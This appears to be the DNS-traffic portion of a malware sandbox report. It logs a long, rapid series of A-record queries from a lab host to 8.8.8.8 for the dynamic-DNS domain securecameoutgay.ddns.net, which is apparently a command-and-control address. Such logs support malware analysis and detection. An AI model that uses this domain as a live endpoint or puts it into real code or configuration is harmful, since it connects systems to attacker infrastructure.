                                                    Oct 12, 2024 23:05:47.165189981 CEST192.168.2.148.8.8.80xfd24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.171942949 CEST192.168.2.148.8.8.80xfd24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.179238081 CEST192.168.2.148.8.8.80x260bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.186001062 CEST192.168.2.148.8.8.80x260bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.192893028 CEST192.168.2.148.8.8.80x260bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.199603081 CEST192.168.2.148.8.8.80x260bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.206629038 CEST192.168.2.148.8.8.80x260bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.213217020 CEST192.168.2.148.8.8.80xb88fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.220084906 CEST192.168.2.148.8.8.80xb88fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.227093935 CEST192.168.2.148.8.8.80xb88fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.234793901 CEST192.168.2.148.8.8.80xb88fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.242146969 CEST192.168.2.148.8.8.80xb88fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.248941898 CEST192.168.2.148.8.8.80x921eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.255670071 CEST192.168.2.148.8.8.80x921eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.262229919 CEST192.168.2.148.8.8.80x921eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.269576073 CEST192.168.2.148.8.8.80x921eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.276325941 CEST192.168.2.148.8.8.80x921eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.283499956 CEST192.168.2.148.8.8.80x9f68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.290216923 CEST192.168.2.148.8.8.80x9f68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.296956062 CEST192.168.2.148.8.8.80x9f68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.303284883 CEST192.168.2.148.8.8.80x9f68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.309629917 CEST192.168.2.148.8.8.80x9f68Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.315881968 CEST192.168.2.148.8.8.80x2bffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.322396994 CEST192.168.2.148.8.8.80x2bffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.328737974 CEST192.168.2.148.8.8.80x2bffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.335225105 CEST192.168.2.148.8.8.80x2bffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.341631889 CEST192.168.2.148.8.8.80x2bffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.347902060 CEST192.168.2.148.8.8.80x2a42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.354331017 CEST192.168.2.148.8.8.80x2a42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.360868931 CEST192.168.2.148.8.8.80x2a42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.367335081 CEST192.168.2.148.8.8.80x2a42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.374105930 CEST192.168.2.148.8.8.80x2a42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.381258965 CEST192.168.2.148.8.8.80x8dc0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.387929916 CEST192.168.2.148.8.8.80x8dc0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.394488096 CEST192.168.2.148.8.8.80x8dc0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.401031971 CEST192.168.2.148.8.8.80x8dc0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.407506943 CEST192.168.2.148.8.8.80x8dc0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.414004087 CEST192.168.2.148.8.8.80xc20eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.420401096 CEST192.168.2.148.8.8.80xc20eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.427018881 CEST192.168.2.148.8.8.80xc20eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.433731079 CEST192.168.2.148.8.8.80xc20eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.440462112 CEST192.168.2.148.8.8.80xc20eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.447417974 CEST192.168.2.148.8.8.80xdd72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.454102039 CEST192.168.2.148.8.8.80xdd72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.460937977 CEST192.168.2.148.8.8.80xdd72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.467782021 CEST192.168.2.148.8.8.80xdd72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.474353075 CEST192.168.2.148.8.8.80xdd72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.481059074 CEST192.168.2.148.8.8.80x6e21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.487862110 CEST192.168.2.148.8.8.80x6e21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.495204926 CEST192.168.2.148.8.8.80x6e21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.501944065 CEST192.168.2.148.8.8.80x6e21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.508835077 CEST192.168.2.148.8.8.80x6e21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.515788078 CEST192.168.2.148.8.8.80xb81cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.523020029 CEST192.168.2.148.8.8.80xb81cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.529808044 CEST192.168.2.148.8.8.80xb81cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.537117958 CEST192.168.2.148.8.8.80xb81cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.544270039 CEST192.168.2.148.8.8.80xb81cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.551199913 CEST192.168.2.148.8.8.80x94caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.558161974 CEST192.168.2.148.8.8.80x94caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.565574884 CEST192.168.2.148.8.8.80x94caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.572668076 CEST192.168.2.148.8.8.80x94caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.579725981 CEST192.168.2.148.8.8.80x94caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.586942911 CEST192.168.2.148.8.8.80xe34eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.595293045 CEST192.168.2.148.8.8.80xe34eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.604615927 CEST192.168.2.148.8.8.80xe34eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.611278057 CEST192.168.2.148.8.8.80xe34eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.618155956 CEST192.168.2.148.8.8.80xe34eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.624717951 CEST192.168.2.148.8.8.80x80beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.631912947 CEST192.168.2.148.8.8.80x80beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.638617039 CEST192.168.2.148.8.8.80x80beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.645154953 CEST192.168.2.148.8.8.80x80beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.652462006 CEST192.168.2.148.8.8.80x80beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.659835100 CEST192.168.2.148.8.8.80x5b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.666431904 CEST192.168.2.148.8.8.80x5b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.673583031 CEST192.168.2.148.8.8.80x5b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.680846930 CEST192.168.2.148.8.8.80x5b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.688662052 CEST192.168.2.148.8.8.80x5b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.696026087 CEST192.168.2.148.8.8.80xf22eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.702470064 CEST192.168.2.148.8.8.80xf22eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.708961964 CEST192.168.2.148.8.8.80xf22eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.715199947 CEST192.168.2.148.8.8.80xf22eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.722053051 CEST192.168.2.148.8.8.80xf22eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.728526115 CEST192.168.2.148.8.8.80xf8c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.735212088 CEST192.168.2.148.8.8.80xf8c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.741692066 CEST192.168.2.148.8.8.80xf8c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.748471975 CEST192.168.2.148.8.8.80xf8c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.755019903 CEST192.168.2.148.8.8.80xf8c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.761723042 CEST192.168.2.148.8.8.80x26ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.768654108 CEST192.168.2.148.8.8.80x26ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.775824070 CEST192.168.2.148.8.8.80x26ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.783063889 CEST192.168.2.148.8.8.80x26ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.789803982 CEST192.168.2.148.8.8.80x26ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.796375036 CEST192.168.2.148.8.8.80xbc33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.803275108 CEST192.168.2.148.8.8.80xbc33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.810237885 CEST192.168.2.148.8.8.80xbc33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.817090988 CEST192.168.2.148.8.8.80xbc33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.824276924 CEST192.168.2.148.8.8.80xbc33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.831345081 CEST192.168.2.148.8.8.80x945cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.838411093 CEST192.168.2.148.8.8.80x945cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.845592976 CEST192.168.2.148.8.8.80x945cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.852664948 CEST192.168.2.148.8.8.80x945cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.859774113 CEST192.168.2.148.8.8.80x945cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.867696047 CEST192.168.2.148.8.8.80x198aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.874742031 CEST192.168.2.148.8.8.80x198aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.881484985 CEST192.168.2.148.8.8.80x198aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.888338089 CEST192.168.2.148.8.8.80x198aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.896656036 CEST192.168.2.148.8.8.80x198aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.904222012 CEST192.168.2.148.8.8.80xc865Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.911840916 CEST192.168.2.148.8.8.80xc865Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.918855906 CEST192.168.2.148.8.8.80xc865Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.925523996 CEST192.168.2.148.8.8.80xc865Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.932352066 CEST192.168.2.148.8.8.80xc865Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.938772917 CEST192.168.2.148.8.8.80x9ef3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.945456028 CEST192.168.2.148.8.8.80x9ef3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.952647924 CEST192.168.2.148.8.8.80x9ef3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.959331036 CEST192.168.2.148.8.8.80x9ef3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.966016054 CEST192.168.2.148.8.8.80x9ef3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.972901106 CEST192.168.2.148.8.8.80x3a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.980442047 CEST192.168.2.148.8.8.80x3a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.988076925 CEST192.168.2.148.8.8.80x3a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:47.994966984 CEST192.168.2.148.8.8.80x3a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.001902103 CEST192.168.2.148.8.8.80x3a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.008948088 CEST192.168.2.148.8.8.80xdec5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.015525103 CEST192.168.2.148.8.8.80xdec5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.022099972 CEST192.168.2.148.8.8.80xdec5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.029171944 CEST192.168.2.148.8.8.80xdec5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.035782099 CEST192.168.2.148.8.8.80xdec5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.042382002 CEST192.168.2.148.8.8.80xe3e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.049139977 CEST192.168.2.148.8.8.80xe3e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.056417942 CEST192.168.2.148.8.8.80xe3e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.063405037 CEST192.168.2.148.8.8.80xe3e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.070372105 CEST192.168.2.148.8.8.80xe3e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.077883959 CEST192.168.2.148.8.8.80xb6c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.084795952 CEST192.168.2.148.8.8.80xb6c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.092025042 CEST192.168.2.148.8.8.80xb6c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.098903894 CEST192.168.2.148.8.8.80xb6c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.105631113 CEST192.168.2.148.8.8.80xb6c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.112221956 CEST192.168.2.148.8.8.80x7bb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.119407892 CEST192.168.2.148.8.8.80x7bb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.126818895 CEST192.168.2.148.8.8.80x7bb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.133909941 CEST192.168.2.148.8.8.80x7bb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.141422987 CEST192.168.2.148.8.8.80x7bb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.148662090 CEST192.168.2.148.8.8.80xa600Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.155546904 CEST192.168.2.148.8.8.80xa600Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.162940979 CEST192.168.2.148.8.8.80xa600Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.170119047 CEST192.168.2.148.8.8.80xa600Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.176954985 CEST192.168.2.148.8.8.80xa600Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.192955017 CEST192.168.2.148.8.8.80x9831Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.203275919 CEST192.168.2.148.8.8.80x9831Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.212820053 CEST192.168.2.148.8.8.80x9831Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.220992088 CEST192.168.2.148.8.8.80x9831Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.230074883 CEST192.168.2.148.8.8.80x9831Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.239438057 CEST192.168.2.148.8.8.80x5e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.247154951 CEST192.168.2.148.8.8.80x5e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.256788015 CEST192.168.2.148.8.8.80x5e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.263618946 CEST192.168.2.148.8.8.80x5e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.271023035 CEST192.168.2.148.8.8.80x5e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.277791023 CEST192.168.2.148.8.8.80x2cbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.285212040 CEST192.168.2.148.8.8.80x2cbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.292323112 CEST192.168.2.148.8.8.80x2cbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.299504042 CEST192.168.2.148.8.8.80x2cbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.306627989 CEST192.168.2.148.8.8.80x2cbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.313841105 CEST192.168.2.148.8.8.80x7392Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.320864916 CEST192.168.2.148.8.8.80x7392Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.328010082 CEST192.168.2.148.8.8.80x7392Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.334953070 CEST192.168.2.148.8.8.80x7392Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.342581034 CEST192.168.2.148.8.8.80x7392Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.349535942 CEST192.168.2.148.8.8.80x8272Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.356281996 CEST192.168.2.148.8.8.80x8272Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.363102913 CEST192.168.2.148.8.8.80x8272Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.371210098 CEST192.168.2.148.8.8.80x8272Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.378278971 CEST192.168.2.148.8.8.80x8272Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.386029959 CEST192.168.2.148.8.8.80x3c26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.395266056 CEST192.168.2.148.8.8.80x3c26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.402570963 CEST192.168.2.148.8.8.80x3c26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.410036087 CEST192.168.2.148.8.8.80x3c26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.417957067 CEST192.168.2.148.8.8.80x3c26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.425249100 CEST192.168.2.148.8.8.80x875Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.432311058 CEST192.168.2.148.8.8.80x875Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.438981056 CEST192.168.2.148.8.8.80x875Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.445872068 CEST192.168.2.148.8.8.80x875Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.453747034 CEST192.168.2.148.8.8.80x875Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.461458921 CEST192.168.2.148.8.8.80xe2f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.469640017 CEST192.168.2.148.8.8.80xe2f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.477586031 CEST192.168.2.148.8.8.80xe2f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.484836102 CEST192.168.2.148.8.8.80xe2f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:48.491760969 CEST192.168.2.148.8.8.80xe2f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
